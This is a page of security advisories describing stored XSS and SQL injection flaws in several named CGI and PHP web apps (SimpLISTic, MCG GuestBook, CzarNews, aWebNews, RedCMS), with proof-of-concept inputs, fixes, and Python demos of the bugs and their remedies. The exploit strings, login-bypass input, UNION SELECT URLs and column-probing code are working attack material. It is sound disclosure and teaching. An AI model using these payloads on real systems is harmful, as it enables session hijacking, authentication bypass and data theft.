Recent Email XSS vulnerabilities

Here is a short summary of recent email XSS vulnerabilities discovered by the eVuln team. The full list, with details, is available on the eVuln Security Advisories page.

email XSS in SimpLISTic.

Description.

An XSS vulnerability was found in the email.cgi script. The email parameter is not properly sanitized: it passes through a simple syntax check (does the value contain "@" and "."?) but through no XSS filter, so any user can add an address that contains HTML or script code. The "List addresses" page in the admin panel renders the stored address as-is, so the payload runs in the administrator's browser.

Exploit.

PoC for the email XSS in SimpLISTic: submit the following value as the email. The leading </textarea> closes the element in which the admin page lists the addresses, so the script tag that follows is rendered as markup.

Email: email@website.com</textarea><script>alert('XSS vulnerability')</script>

Solution.

The email parameter only passes through this simple filter (Perl):

if (($FORM{email} =~ m/@/) && ($FORM{email} =~ m/\./)) {$atcheck = 1}

This is not enough to stop XSS: the check accepts any string that contains "@" and "." and leaves "<", ">" and quotes untouched. Recommended fix is to HTML-encode the value. The "&" substitution has to run first, otherwise the entities produced by the later substitutions would be encoded a second time:

$FORM{email} =~ s/\&/\&amp\;/g;    # must come first
$FORM{email} =~ s/\</\&lt\;/g;
$FORM{email} =~ s/\>/\&gt\;/g;
$FORM{email} =~ s/\"/\&quot\;/g;
$FORM{email} =~ s/\'/\&#x27\;/g;
$FORM{email} =~ s/\//\&#x2F\;/g;

Apply this filter at output time, right before including $FORM{email} in HTML code, rather than once on the stored value: an address that is rendered on more than one page would otherwise end up double-encoded. This encoding covers HTML body and attribute contexts only; a value placed inside a script block or a URL needs encoding appropriate to that context.
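The following is an added example, written in Python rather than the script's own Perl and not taken from SimpLISTic or its vendor. It ports the "@ and ." check and the six substitutions of the recommended fix as-is, renders them into a hypothetical stand-in for the "List addresses" row (the real page's HTML is not reproduced; only the fact that it uses a textarea is inferred from the PoC), and runs both the advisory's PoC payload and the attribute-breakout shape used against the PHP scripts later on this page. The second input is constructed.

```python
# Added example, not SimpLISTic code. Python port of the Perl check and fix
# quoted in the advisory, exercised against the PoC payloads.


def looks_like_email(value: str) -> bool:
    # Port of the vendor check: it only asks whether "@" and "." are present,
    # which says nothing about whether the value is safe to place into HTML.
    return "@" in value and "." in value


# The six substitutions of the recommended Perl fix, in the same order.
# "&" must be first: if it ran after "<" -> "&lt;", the "&" of "&lt;" would
# be re-encoded to "&amp;lt;" and the page would show the entity text.
_HTML_ESCAPES = (
    ("&", "&amp;"),
    ("<", "&lt;"),
    (">", "&gt;"),
    ('"', "&quot;"),
    ("'", "&#x27;"),
    ("/", "&#x2F;"),
)


def html_escape(value: str) -> str:
    for raw, entity in _HTML_ESCAPES:
        value = value.replace(raw, entity)
    return value


# Hypothetical stand-in for one row of the admin "List addresses" page.
# The PoC starts with </textarea>, so the real page evidently lists addresses
# inside a textarea; the template itself is an assumption.
_ROW = '<tr><td><textarea name="email">%s</textarea></td></tr>'
_PREFIX, _SUFFIX = _ROW.split("%s")


def render_row_unsafe(email: str) -> str:
    # What the unpatched script effectively does: raw value into the markup.
    return _ROW % email


def render_row(email: str) -> str:
    # Patched behaviour: encode at output time, right before insertion.
    return _ROW % html_escape(email)


def breaks_out(rendered: str) -> bool:
    # True when the user-controlled part of the rendered row still holds a raw
    # tag delimiter or quote, i.e. it can still close the textarea or an
    # attribute and start markup of its own.
    inner = rendered[len(_PREFIX):len(rendered) - len(_SUFFIX)]
    return any(ch in inner for ch in "<>\"'")


# Constructed inputs: the advisory's PoC verbatim, and the ">[XSS]<aaa aaa="
# attribute-breakout shape from the PHP advisories on this page, given an "@"
# and a "." so that it also passes the syntax check.
POC_TEXTAREA = "email@website.com</textarea><script>alert('XSS vulnerability')</script>"
POC_ATTRIBUTE = 'a@b.c">[XSS]<aaa aaa="'


if __name__ == "__main__":
    for payload in (POC_TEXTAREA, POC_ATTRIBUTE):
        print("passes @/. check      :", looks_like_email(payload))
        print("unsafe render breaks out:", breaks_out(render_row_unsafe(payload)))
        print("escaped render breaks out:", breaks_out(render_row(payload)))
```

Both payloads pass the syntax check, break out of the unpatched row, and are inert after encoding. Python's html.escape(value, quote=True) performs five of these six substitutions (it does not touch "/"), so it is an acceptable substitute where the Perl fix's extra slash encoding is not wanted.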

Check for updates from MrCgiGuy website: http://www.mrcgiguy.com/

Other details >>

Multiple XSS in MCG GuestBook.

Description.

All vulnerabilities were found in the gb.cgi script, which has no proper XSS sanitation filters. The following parameters are affected:

  • name
  • email
  • website
  • message

None of these parameters is sanitized, so any HTML or script code can be inserted into the guestbook. The admin panel is vulnerable as well.

Exploit.

None of the form parameters passes any XSS sanitation filter; submit the following values:

Parameter "name": <script>alert('XSS Vuln')</script>

Parameter "email": "<script>alert('Vulnerable')</script>

Parameter "website": "<script>alert('Vulnerable')</script>

Parameter "message": <script>alert('XSS Vuln')</script>

Solution

Solution is not available.

Other details >>

XSS and Multiple SQL Injection in CzarNews.

Description.

Vulnerable script: news.php

The email parameter is not properly sanitized. This can be used to post arbitrary HTML or web script code.

Condition: magic_quotes_gpc = off

Vulnerable scripts: cn_auth.php, news.php

The parameters usern (cn_auth.php), passw (cn_auth.php), s (news.php) and a (dpost.php) are not properly sanitized before being used in SQL queries. This can be used to bypass authentication or run arbitrary SQL by injecting SQL code.

Condition: magic_quotes_gpc = off (with magic quotes on, PHP would prefix the quotes in the payloads below with a backslash)

Exploit.

XSS via the comment form:

URL: http://[host]/news.php?a=1

Post a Comment

Email: ">[XSS]<aaa aaa="

Authentication bypass via the login form:

URL: http://[host]/index.php

Username: ' or 1/*

Password: any

SQL injection via the news search:

URL: http://[host]/news.php

News Search: zzzz%' union select 1,2,3,4,5,6,7,8,9,10/*

SQL injection via the a parameter:

URL: http://[host]/news.php?a=999'%20union%20select%201,2,3,4,5,6,7,8,9,10/*

Solution

Solution is not available.

Other details >>

Multiple XSS and SQL Injection in aWebNews.

Description.

Vulnerable script: visview.php

The parameters yname, emailadd, subject and comment are not properly sanitized. This can be used to post arbitrary HTML or web script code.

Vulnerable scripts: login.php, fpass.php, visview.php

The variables $user123 (login.php), $user123 (fpass.php) and $_GET['cid'] (visview.php) are not properly sanitized before being used in SQL queries. This can be used to run arbitrary SQL by injecting SQL code.

Condition: magic_quotes_gpc = off (with magic quotes on, PHP would prefix the quotes in the payloads below with a backslash)

Exploit.

XSS via the comment form:

URL: http://[host]/visview.php?b=newc&cid=2916852

Your Name: [XSS]

Email / Website: aaa">[XSS]<aaa aaa="

Comment Subject: [XSS]

Comment Text: [XSS]

SQL injection via the cid parameter:

URL: http://[host]/visview.php?a=c&cid=2916852'%20union%20select%201,2,3,4,5,6/*

Solution

Solution is not available.

Other details >>

Multiple XSS and SQL Injection in RedCMS.

Description.

Vulnerable script: register.php

The parameters email, location and website are not properly sanitized. This can be used to post arbitrary HTML or web script code.

Vulnerable scripts: login.php, profile.php, register.php, ...

The variables $username (login.php), $password (login.php), $u (profile.php), $username (register.php), $password (register.php), ... In fact, none of the user-supplied variables is properly sanitized before being used in SQL queries. This can be used to bypass authentication or run arbitrary SQL by injecting SQL code.

Condition: magic_quotes_gpc = off (with magic quotes on, PHP would prefix the quotes in the payloads below with a backslash)

Exploit.

XSS via the registration form:

URL: http://[host]/redcms/register.php

Email: aaa'>[XSS]<aaa aaa=';

Location: aaa'>[XSS]<aaa aaa=';

Website: aaa'>[XSS]<aaa aaa=';

Authentication bypass via the login form:

URL: http://[host]/redcms/login.php

Username: ' or 1/*

Password: any

SQL injection via the id parameter of profile.php:

URL: http://[host]/redcms/profile.php?id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
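The CzarNews, aWebNews and RedCMS advisories above all use the same two injection shapes: a single quote that ends a string literal followed by "or 1/*" to bypass a login, and "union select 1,2,...,N" to pull other data out of a search or id parameter. The following is an added example, not the code of any of these products: Python with sqlite3 standing in for MySQL (both accept C-style comments, so the "/*" trick that swallows the rest of the query works the same way). The tables, column names and the plaintext password are constructed for the demo. The probing function explains where the "1,2,3,...,N" lists in the advisories come from.

```python
# Added example, not CzarNews/aWebNews/RedCMS code. sqlite3 stands in for
# MySQL; schema and column names are constructed assumptions.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext password only to keep the demo short; never store one this way.
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret')")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO news (title, body) VALUES ('hello', 'world')")
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    # Query built by string formatting, the pattern the advisories describe.
    # Username "' or 1/*" turns the WHERE clause into  username = '' or 1
    # and the comment hides the password check.
    sql = "SELECT id FROM users WHERE username = '%s' AND password = '%s'" % (username, password)
    return conn.execute(sql).fetchone() is not None


def news_search_vulnerable(conn, term: str) -> list:
    # Same mistake inside a LIKE pattern, as in the "News Search" field.
    sql = "SELECT id, title, body FROM news WHERE title LIKE '%%%s%%'" % term
    return conn.execute(sql).fetchall()


def probe_column_count(conn, max_cols: int):
    # A UNION only parses when both sides have the same number of columns, so
    # an attacker grows "1,2,...,N" until the database stops raising an error.
    # Returns the first N that works, or None if none does within max_cols.
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            news_search_vulnerable(conn, "zzzz%%' union select %s/*" % cols)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def login_safe(conn, username: str, password: str) -> bool:
    # Placeholders: the driver passes the values separately from the SQL text,
    # so a quote in the username can never terminate the string literal.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def news_search_safe(conn, term: str) -> list:
    # The wildcard characters are added to the bound value, not to the SQL.
    sql = "SELECT id, title, body FROM news WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    bypass = "' or 1/*"
    print("vulnerable login with %r -> %s" % (bypass, login_vulnerable(conn, bypass, "any")))
    print("parameterised login with %r -> %s" % (bypass, login_safe(conn, bypass, "any")))
    print("union rows:", news_search_vulnerable(conn, "zzzz%' union select 1,2,3/*"))
    print("column count found by probing:", probe_column_count(conn, 10))
```

Bound parameters are the fix the advisories leave unstated; magic_quotes_gpc only prefixed quotes with a backslash, which is why the advisories list it as a condition, and it was removed from PHP in 5.4. Note that in the parameterised search a "%" or "_" typed by the user still acts as a LIKE wildcard; that is a separate, non-injection concern handled with an ESCAPE clause if it matters.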

Solution

Solution is not available.

Other details >>